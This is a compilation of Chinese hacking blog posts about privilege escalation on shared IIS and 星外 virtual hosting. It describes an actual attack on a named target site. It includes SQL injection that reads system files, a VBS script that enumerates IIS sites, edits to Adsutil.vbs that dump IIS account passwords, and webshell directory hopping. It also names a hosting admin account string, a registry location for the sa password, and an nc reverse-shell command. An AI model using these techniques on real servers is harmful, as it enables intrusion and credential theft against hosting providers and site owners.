drop table [nspcn]
CREATE TABLE [nspcn](ResultTxt nvarchar(1024) NULL)
BULK INSERT [nspcn] FROM 'c:\boot.ini' WITH (KEEPNULLS)
insert into [nspcn] values ('g_over');Alter Table [nspcn] add id int NOT NULL IDENTITY (1,1)
select * from [nspcn]

今晚在搞 http://gov.com.im/ 的时候拿下旁站权限，但不能夸到目标站的目录下，眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过 pr 提权，单 asp 一执行 pr 就卡死了。。

       无奈之下找了群里龙儿心一起来研究，龙儿心经验不错，到 shell 上立马就搞定了目标站的路径，获取 IIS 网站路径和其他基本信息也是使用一个 VBS 脚本搞定的，这个在我 blog 中有一个文章帖出来代码。这里我将就再帖下，并说明用法！

Set ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
sServerName=Obj3w.ServerComment
Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root")
ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf
End If
Next
WScript.Echo ListAllWeb
Set ObjService=Nothing
WScript.Quit

       将以上代码保存为 1.vbs ，执行 ”cscript C:\recycler\1.vbs“ 命令， cscript C:\recycler\1.vbs 是我传到服务器上的路径，执行成功后就会列出 IIS 的基本信息了。

如上图所示，列出来的信息中包含了网站 id 显示名称 以及路径三个信息，这里我们要记下目标站的 id 为： 360363061 ，路径为： D:\wwwroot\fucksbhack8\wwwroot 。

       现在就得到了目标网站的基本信息了，但是这对我们拿下最终目标站的权限有啥用呢？ 呵呵！不急，我们接下来就要想办法得到这个网站的 iis 用户名和密码，然后使用 bs 大牛写的 webshell 来夸目录。

       当时和龙儿心搞定了目标站路径信息后为得到目标站的 IIS 账号密码还真费了不少功夫，后来还是多亏了龙儿心给我看的一篇文章，仔细看了过后才明白了怎么使用 Adsutil.vbs 来获取 IIS 账号密码。首先搞个 Adsutil.vbs 文件来，文件内容太多，我就不贴出来了，本文中所用到的工具最后我会全部打包。

       搞到 Adsutil.vbs 文件后我们需要改动下内容，我首先搜索 ”If (Attribute = True) Then“ ，然后再下面几行中会看到如下内容：

    If (Attribute = True) Then
         IsSecureProperty = False
    Else
         IsSecureProperty = True
    End If

       首先我们要获取目标站点 IIS 的账号，我们将第一个 IsSecureProperty 的值修改成 IsSecureProperty = False ，然后保存，上传到服务器上。

       在执行的时候我们需要用到之前使用的 vbs 脚本获取到目标网站的 id 值，这里是 360363061 ，然后我们使用 ”cscript C:\recycler\k.vbs enum w3svc/360363061/root“ 命令来获取目标站的 IIS 账号信息。

   如上图所示，成功的获取到目标站 IIS 账号为 sbhack8_web ，接下来我们就是获取密码了，同样的方法还需要将 Adsutil.vbs 文件中刚才修改的地方，将第二个 IsSecureProperty 修改成 IsSecureProperty = False ，然后再把第一个 IsSecureProperty 修改成 IsSecureProperty = True ，既两个的值互相调换一下，然后再执行同样的命令 ”cscript C:\recycler\k.vbs enum w3svc/360363061/root“ 来获取密码信息。

这样就搞到了目标站 IIS 用户的账号和密码了，先就要排 bs 大牛的 shell 上场了，在要使用 BS 大牛的 shell 之前我们还需要改动喜爱 BS 大牛的 shell 内容。

       搜索 bs 大牛 shell 中内容 ”Const bOtherUser=False“ ，然后修改成 ”Const bOtherUser=True“ ，保存，上传到服务器任意网站目录下，当然还是要支持 asp 的了，然后访问，然后出现下图所示内容。

  这里直接点击 OK ，然后稍等下一下就会弹出登陆框了，如下图所示：

然后我们在这里输入刚才得到的目标站的 IIS 账号和密码，然后登陆，成功了的话就会进入 shell 的登录框了。

这里如数 webshell 的密码进入后直接拿目标站的路径跳转，然后就会发现目标站的目录和文件全部列出来了！不 BT 的话是有写入权限的！！方便大家我把文章中提及的工具全部打包了！！

       * 最后补充下，我下来本地测试了下 Adsutil.vbs 的修改地方，我们直接将 If (Attribute = True) Then 下面的两个 IsSecureProperty 值都修改为 True 的时候就会同时列出账号和密码了，没必要获取了账号，然后再修改下去获取密码。

附件下载：
cscript.rar+adsutil.vbs.rar 64.18KB

秒杀星外虚拟机系统（星外虚拟机提权"0day"） 作者：作者：Rootkit  原文：http://t00ls.net/thread-13600-1-1.html
星外虚拟机一直被认为很BT，其实我感 觉还是很好搞，至少他支持aspx。找到有的执行目录一般99% 可以秒杀他 ，拿下服务器权限。
星外可执行的目录最新版本C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ 这个目录，还有就是C:\PHP\PEAR 这个目录。C:\PHP\PEAR在10，11月份的时候我还发现很多虚拟机可写可执行的，现在发现的不是很多了。C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ 这个目录论坛提到过很多次了，昨晚杀虫剂的文章也写的很明白了。

星外的最大的BUG就是 FTP是系统自带的，里面可以 通过列IIS配置信息 列出来。(上传个cscript.exe和 修改过的adsutil.vbs)

7i24虚拟主机管理平台受控端freehostrunat fa41328538d7be36e83ae91a78a1b16f!7Freehostrunat这个用户是安装星外时候建立的，属于administrators用户组里的。到这里估计还是有人不明白 这个用户fa41328538d7be36e83ae91a78a1b16f!7 是什么加密方式。我先前也这样犯傻过，还跑去翻星外有关的注册表，配置文件等等，到最后还是没解密出来。后来想了想，他的验证过程不可能加密的，因为windows自带的FTP又不会识别他的这密文，其他网站都是明文，所以直接登陆就行。

+++++++++++++++++++++++++++++++++++++++++++
谈对星外主机提权利用  作者：杀虫剂   原文：http://t00ls.net/thread-13574-1-1.html
最近T00LS上谈了比较多星外提权的方法，最近刚好碰到了站结合些大牛的思路写个过程！目标是钓鱼站很是讨厌,没0DAY 程序也很安全,旁注拿到了SHELL.测试支持ASPX脚本！上传了个BIN免杀ASPX大马，其他结果大家也知道了,目标跨不过去,MYSQL等目录跳不过去,CMD和其它提权工具上传执行显示空白或者提示无权限！RegShell读注册表没发现多少利用的东西，根据些信息知道是星外

对新手来说在这里很容易陷入困境！星外sa密码注册表位置：HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 32位MD5加密很多情况下MD5跑不出
有高人找到了个可写可执行目录C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ cmd.exe上传在这里可以执行些简单的命令如: set,systeminfo,ipconfig,ping,等~利用这些命令可以收到比较多的系统信息.如果你比较幸运管理配置不当的话还可以DIR C.D.E等其他盘，很久以前小K(khjl1)给我发了个for命令利用，for命令比dir执行权限要小 类似dir的功能 大家可以在不能dir的情况下试下for /r d:\freehost\ %i in (test) do @echo %i >>C:\路径\1.txt  把d:\freehost\所有文件写入1.txt，在用VBS读IIS密码时候很多提到NC反弹,其实不需要  很多情况下NC根本反弹不了,防火墙都挡住了.成功率很底。
如果你失败了而非得继续NC的话可以试下这个兄弟的,大家或许可以根据这个方法测试下。反弹cmdshell："c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
通常都不会成功。而直接在 cmd路径上 输入 c:\windows\temp\nc.exe    命令输入   -vv ip 999 -e c:\windows\temp\cmd.exe却能成功。。
******我是没成功,呵呵******
systeminfo看了下管理把补丁打得很齐全用VBS提权测试  这里我们可以把iis.vbs上传到WEB跟目录下而不必传到Media Index目录但是提权工具必须传到Media Index才有权限执行切记~  C:\Documents and Settings\下有空格所以得用""包含 如:CmdPath:C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cmd.exe    Argument: /c "c:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cscript.exe" d:\freehost\web\1.vbs   不包含的话会提示失败，所以细节决定成败！

iis.vbs列出了所有域名和路径当然也包括我们的目标站,试下用TYPE命令目标数据配置信息(提权下可以读些MSSQL或MYSQL的WEB配置等~~~信息方便提权)我这里只针对目标,这里库是ACCESS的  再结合手上的几个VBS读IIS用户和密码  用读出的密码21端口可以连接 收工！
本文来源于Ｅｖｉｌ的博客http://www.evilhk.com/ , 原文地址：http://www.evilhk.com/cat_3/542/